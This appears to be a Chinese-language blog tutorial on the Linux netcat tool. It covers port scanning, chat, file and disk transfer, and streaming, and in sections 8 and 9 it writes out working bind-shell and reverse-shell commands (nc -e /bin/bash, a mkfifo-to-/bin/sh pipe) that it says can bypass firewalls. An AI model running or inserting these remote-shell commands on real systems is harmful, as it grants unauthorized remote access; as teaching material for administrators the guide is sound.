万用socket神器Linux Netcat 命令
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。
netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。
1. 在ubuntu上的安装
Ubuntu上默认安装的是netcat-openbsd,而不是经典的netcat-traditional. 网上例子很多都是以netcat-traditional为例. sudo apt-get -y install netcat-traditional (安装传统nc) 设置默认的nc,选择/bin/nc.traditional: sudo update-alternatives --config nc (终端下输入)
设置默认nc:
mylinux@ubuntu:~$ sudo update-alternatives --config nc [sudo] password for mylinux: 有 2 个候选项可用于替换 nc (提供 /bin/nc)。选择 路径 优先级 状态 ------------------------------------------------------------ * 0 /bin/nc.openbsd 50 自动模式1 /bin/nc.openbsd 50 手动模式2 /bin/nc.traditional 10 手动模式要维持当前值[*]请按回车键,或者键入选择的编号:2 update-alternatives: using /bin/nc.traditional to provide /bin/nc (nc) in 手动模式
2. 常用的命令
1,端口扫描
端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞。
$nc -z -v -n 172.31.100.7 21-25
可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换(谢谢@jxing 指点)
v 参数指使用冗余选项(译者注:即详细输出)
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名
这个命令会打印21到25 所有开放的端口。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner。
一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。
$ nc -v 172.31.100.7 21
netcat 命令会连接开放端口21并且打印运行在这个端口上服务的banner信息。
2,Chat Server
假如你想和你的朋友聊聊,有很多的软件和信息服务可以供你使用。但是,如果你没有这么奢侈的配置,比如你在计算机实验室,所有的对外的连接都是被限制的,你怎样和整天坐在隔壁房间的朋友沟通那?不要郁闷了,netcat提供了这样一种方法,你只需要创建一个Chat服务器,一个预先确定好的端口,这样子他就可以联系到你了。
Server
$nc -l 1567
netcat 命令在1567端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。
Client
$nc 172.31.100.7 1567
不管你在机器B上键入什么都会出现在机器A上。
3,文件传输
大部分时间中,我们都在试图通过网络或者其他工具传输文件。有很多种方法,比如FTP,SCP,SMB等等,但是当你只是需要临时或者一次传输文件,真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设,你想要传一个文件file.txt 从A 到B。A或者B都可以作为服务器或者客户端,以下,让A作为服务器,B为客户端。
Server
$nc -l 1567 < file.txt
Client
$nc -n 172.31.100.7 1567 > file.txt
这里我们创建了一个服务器在A上并且重定向netcat的输入为文件file.txt,那么当任何成功连接到该端口,netcat会发送file的文件内容。
在客户端我们重定向输出到file.txt,当B连接到A,A发送文件内容,B保存文件内容到file.txt.
没有必要创建文件源作为Server,我们也可以相反的方法使用。像下面的我们发送文件从B到A,但是服务器创建在A上,这次我们仅需要重定向netcat的输出并且重定向B的输入文件。
B作为Server
Server
$nc -l 1567 > file.txt
Client
nc 172.31.100.23 1567 < file.txt
4,目录传输
发送一个文件很简单,但是如果我们想要发送多个文件,或者整个目录,一样很简单,只需要使用压缩工具tar,压缩后发送压缩包。
如果你想要通过网络传输一个目录从A到B。
Server
$tar -cvf – dir_name | nc -l 1567
Client
$nc -n 172.31.100.7 1567 | tar -xvf -
这里在A服务器上,我们创建一个tar归档包并且通过-在控制台重定向它,然后使用管道,重定向给netcat,netcat可以通过网络发送它。
在客户端我们下载该压缩包通过netcat 管道然后打开文件。
如果想要节省带宽传输压缩包,我们可以使用bzip2或者其他工具压缩。
Server
$tar -cvf – dir_name| bzip2 -z | nc -l 1567
通过bzip2压缩
Client
$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -
使用bzip2解压
5. 加密你通过网络发送的数据
如果你担心你在网络上发送数据的安全,你可以在发送你的数据之前用如mcrypt的工具加密。
服务端
$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
使用mcrypt工具加密数据。
客户端
$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567
使用mcrypt工具解密数据。
以上两个命令会提示需要密码,确保两端使用相同的密码。
这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。
6. 流视频
虽然不是生成流视频的最好方法,但如果服务器上没有特定的工具,使用netcat,我们仍然有希望做成这件事。
服务端
$cat video.avi | nc -l 1567
这里我们只是从一个视频文件中读入并重定向输出到netcat客户端
$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -
这里我们从socket中读入数据并重定向到mplayer。
7,克隆一个设备
如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而你不想在重复配置一遍。不在需要重复配置安装的过程,只启动另一台机器的一些引导可以随身碟和克隆你的机器。
克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上
Server
$dd if=/dev/sda | nc -l 1567
Client
$nc -n 172.31.100.7 1567 | dd of=/dev/sda
dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。
8,打开一个shell
我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用netcat创建远程shell。
假设你的netcat支持 -c -e 参数(默认 netcat)
Server
$nc -l 1567 -e /bin/bash -i
Client
$nc 172.31.100.7 1567
这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash
假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell
Server
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口1567上。至此,我们已经把netcat的输出重定向到fifo文件中。
说明:
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件并且其内容发送给sh命令
sh命令进程受到输入并把它写回到netcat。
netcat 通过网络发送输出到client
至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。
在客户端仅仅简单连接到服务器
Client
$nc -n 172.31.100.7 1567
你会得到一个shell提示符在客户端
9,反向shell
反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。
服务端
$nc -l 1567
在客户端,简单地告诉netcat在连接完成后,执行shell。
客户端
$nc 172.31.100.7 1567 -e /bin/bash
现在,什么是反向shell的特别之处呢
反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为172.31.100.7,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。
10. 指定源端口
假设你的防火墙过滤除25端口外其它所有端口,你需要使用-p选项指定源端口。
服务器端
$nc -l 1567
客户端
$nc 172.31.100.7 1567 -p 25
使用1024以内的端口需要root权限。
该命令将在客户端开启25端口用于通讯,否则将使用随机端口。
11. 指定源地址
假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。
服务器端
$nc -u -l 1567 < file.txt
客户端
$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt
该命令将绑定地址172.31.100.5。
这仅仅是使用netcat的一些示例。
其它用途有:
- 使用-t选项模拟Telnet客户端,
- HTTP客户端用于下载文件,
- 连接到邮件服务器,使用SMTP协议检查邮件,
- 使用ffmpeg截取屏幕并通过流式传输分享,等等。其它更多用途。
简单来说,只要你了解协议就可以使用netcat作为网络通讯媒介,实现各种客户端。
万用socket神器Linux Netcat 命令相关推荐
- Linux Netcat 命令——网络工具中的瑞士×××
Netcat是网络工具中的瑞士×××,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netcat所做 ...
- linux nc命令--功能强大的网络工具
linux nc命令--功能强大的网络工具 Socket长连接 AT指令测试,连接阿里云服务器 EC200S 4G CAT.1模块 nc命令简介 1)端口扫描 2) 远程拷贝文件 3) 简单聊天工具 ...
- 如何启动netcat_linux netcat命令使用技巧
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netcat所做的 ...
- linux批量命令换行,Linux 下的这些高效指令,是你快速入门运维的神器
原标题:Linux 下的这些高效指令,是你快速入门运维的神器 Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户.多任务.支持多线程和多CPU的操作系统.它 ...
- 28个Unix/Linux的命令行神器 | 酷壳 - CoolShell.cn
28个Unix/Linux的命令行神器 | 酷壳 - CoolShell.cn 28个Unix/Linux的命令行神器 | 酷壳 - CoolShell.cn slurm 查看网络流量的一个工具 官方 ...
- linux 神奇命令,Linux 命令神器:lsof 入门
lsof是系统管理/安全的尤伯工具.我大多数时候用它来从系统获得与网络连接相关的信息,但那只是这个强大而又鲜为人知的应用的第一步.将这个工具称之为lsof真实名副其实,因为它是指"列出打开文 ...
- Linux 网络命令大全
总的来说,Linux 网络命令涉及到这么几块: - 网络配置: ifconfig. ip - 连通性探测: ping. traceroute. telnet. mtr - 网络连接: netstat. ...
- Linux nc命令详解
Linux nc命令用于设置路由器. 执行本指令可设置路由器的相关参数. 语法: nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数&g ...
- Linux 常用命令整理(Centos7) (时区/正则/sed/htop/screen/ln/awk/……)
目录 Linux 常用命令整理(Centos7) (附加正则.时区.git等) 一.系统查询常用命令: 1.文件中空格制表符替换sed 2.查看宿主机的用户名密码 3.last .w.lastb 查看 ...
最新文章
- FT(Fourier Transform)在滤波上的应用
- 【机器学习入门】(2) 朴素贝叶斯算法:原理、实例应用(文档分类预测)附python完整代码及数据集
- mysql addslashes_PHP函数addslashes和mysql_real_escape_string的区别
- .NET Core跨平台的奥秘[中篇]:复用之殇
- 本地方法(JNI)——编码签名
- java删除指定索引元素_将对象/元素添加到列表中的Java指定索引处
- 过滤器filter,监听器listener
- 【华为云技术分享】数据管理服务DAS 之 数据库自动化运维功能展播4:慢SQL
- HelloDjango 启动!免费带你学Django全栈!
- Minimum Window Substring @LeetCode
- [android] AndroidManifest.xml 详解
- 笔记本电脑网卡驱动损坏问题
- Github | 标星 1W+ 清华大学计算机系课程攻略!
- HTML 字体 大小 颜色对照表
- java医疗保险系统_医疗保险管理系统设计 Java
- 圆方树总结 [uoj30]Tourists
- Python项目实战:爬取糗事百科最热门的内涵搞笑段子
- 学习Python的入门建议及资料分享
- 网络层———IPv6(1)
- 学会这三招引流方法,让你的淘宝店铺流量暴增
热门文章
- html框架实验总结,网页设计实训心得
- Linux PXE批量网络装机与Kickstart 无人值守安装
- linux密码暴力破解之SHA-512破解
- Android学习之SQLite
- 内存不能为读写的解决方法
- vue函数如何调用其他函数?_好程序员Python教程系列之递归函数与匿名函数调用...
- ajax拿table里的th值,Jquery Ajax 异步设置Table中某列的值
- openpyxl写入一行数据_老板让我从几百个Excel中查找数据,我用Python一分钟搞定!...
- request body 里丢东西了_26. Scrapy 框架-模拟登录-Request、Response
- java 内存溢出 内存泄露_JVM——内存泄漏与内存溢出